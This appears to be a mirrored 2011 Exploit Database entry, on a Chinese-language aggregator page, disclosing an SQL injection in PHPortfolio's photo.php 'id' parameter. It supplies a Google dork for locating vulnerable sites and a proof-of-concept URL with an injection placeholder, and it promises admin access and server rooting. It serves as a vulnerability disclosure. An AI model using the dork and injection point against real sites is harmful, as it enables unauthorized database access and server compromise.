PHPortfolio – SQL Injection

• Exploit Database
• 39 阅读

• 作者： lionaneesh
  日期： 2011-05-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17316/

• # Exploit Title: SQL Injection Vulnerbility in PHP Portfolio
  # Google Dork: "Powered by PHPortfolio"
  # Date: 23/5/2011
  # Author: lionaneesh
  # Software Link: http://outshine.com/phportfolio/ http://www.outshine.com/software/phportfolio/intro.php
  # Risk Level : High
  # A hacker can get admin access to web database leading to further
  attacks , Shelling and Rooting of server
  
  POC :-
  
  http://[sitename]/[pathToApplication]/photo.php?id=%InjectHere%
  
  
  Sample :-
  
  http://site.com/work/photo.php?id=%injectHere%19
  
  --------------------------------------------------------------------------------
  ================================================================================
  lionaneesh
  
  Catch my News : http://www.thehackernews.com/search?q=lionaneesh
  
  Greetz to : lucky(indishell) , Aasim Shaikh(indishell) , Team
  Indishell , Team ICA
  
  Hack For INDIA , Live for INDIA
  
  ================================================================================
  --------------------------------------------------------------------------------
  
  -- 
  Thanks
  Aneesh Dogra (lionaneesh)